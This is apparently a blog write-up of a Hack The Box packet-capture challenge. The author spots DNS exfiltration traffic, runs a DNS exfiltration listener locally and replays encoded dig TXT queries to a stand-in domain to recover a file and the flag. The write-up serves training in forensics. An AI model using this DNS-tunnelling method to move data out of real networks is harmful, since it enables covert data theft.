Hackthebox – Keep Tryin’

For this challenge I found a wireshark file and the hint said ‘This packet capture seems to show some suspicious traffic‘. Enough to start working with so time to take a look at the wireshark file.

When opening the wireshark file, the suspicious connections immediately pop out. There are several DNS packets containing apparent DNS exfiltration traffic.

Additional analysis reveal two HTTP POST requests. One containing the value to a /flag URI which statesĀ ‘TryHarder’, the other request goes to the /lootz URI and contains a base64 hash which, after decoding says ‘Keep trying, buffy’.

The DNS entries are interesting though, and given the DNS exfiltration tools a co-worker used recently, gave me a hint that it should be something like that. Some googling for the specific sequence lead me to a github repository containing both a C# and Python version of dnsexfiltrator tool.

root@kalivm:~/keeptrying# python dnsexfil.py -d totallylegit.com -p 1234
[*] DNS server listening on port 53

After some fiddling with the python script I got it to start a listener on port 53 which looked like a normal DNS server but, after inspecting the code, was waiting for the init sequence I also noticed in the PCAP file.

root@kalivm:~/keeptrying# dig TXT @localhost init.c2VjcmV0LnR4dHwx.totallylegit.com

So I tried to send the same request I saw in the dns traffic. This seemed to be the right thing as it was expecting something like this.

[!] Stopping DNS Server
Traceback (most recent call last):
  File "dnsexfil.py", line 158, in 
    msg = fromBase32(msgParts[1])
  File "dnsexfil.py", line 81, in fromBase32
    return b32decode(msg.upper() + padding)
  File "/usr/lib/python2.7/base64.py", line 229, in b32decode
    raise TypeError('Non-base32 digit found')
TypeError: Non-base32 digit found

In the other terminal however, the python script crashed with the message that a non-base32 digit has been found. After re-encoding the init request to a base32 string, it worked.

[+] Data was encoded using Base64URL
[+] Receiving file [secret.txt] as a ZIP file in [1] chunks
[============================================================] 100.0%	Receiving file	

[+] Decrypting using password [1234] and saving to output file [secret.txt.zip]
[+] Output file [secret.txt.zip] saved successfully

However, after receiving a file, the file still came out all jumbled and useless. So I must have missed something. After trying to send my own file across, the encoding/decoding sequence worked without issues, so I assumed there had to be something wrong with the password.

root@kalivm:~/keeptrying# python dnsexfil.py -d totallylegit.com -p TryHarder
[*] DNS server listening on port 53

I decided to restart the script, now with the alleged password that I saw in the HTTP requests.

root@kalivm:~/keeptrying# dig TXT @localhost INIT.ONSWG4TFOQXHI6DUPQYQ.totallylegit.com
root@kalivm:~/keeptrying# dig TXT @localhost 0.0ejXWsr6TH-P_1xkEstaVwi7WDy8AcxufnGotWXH3ckb2Lh5A-qFljIWOAOLUS0.T1W8P4CpiCZbCM7_QKcv-r0JG29RpsyYY5YkZRxo7YDIYUJpHlGgxu5PWV1G_DA.KNrmnrktfbeDgzcpPJBjPTeMYx3Qs1Q6bAuFhROWXemJ80gPTYIz0xl8usJQN3m.w.totallylegit.com

I resend the Base32-encoded init request and the ‘normal’ DNS request for the TXT record to the server.

[+] Data was encoded using Base64URL
[+] Receiving file [secret.txt] as a ZIP file in [1] chunks
[============================================================] 100.0%	Receiving file	

[+] Decrypting using password [TryHarder] and saving to output file [secret.txt.zip]
[+] Output file [secret.txt.zip] saved successfully

This looks promising, time to try and extract the zip file to see its contents.

root@kalivm:~/keeptrying# unzip secret.txt.zip 
Archive:  secret.txt.zip
  inflating: secret.txt
root@kalivm:~/keeptrying# cat secret.txt

There is the flag!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.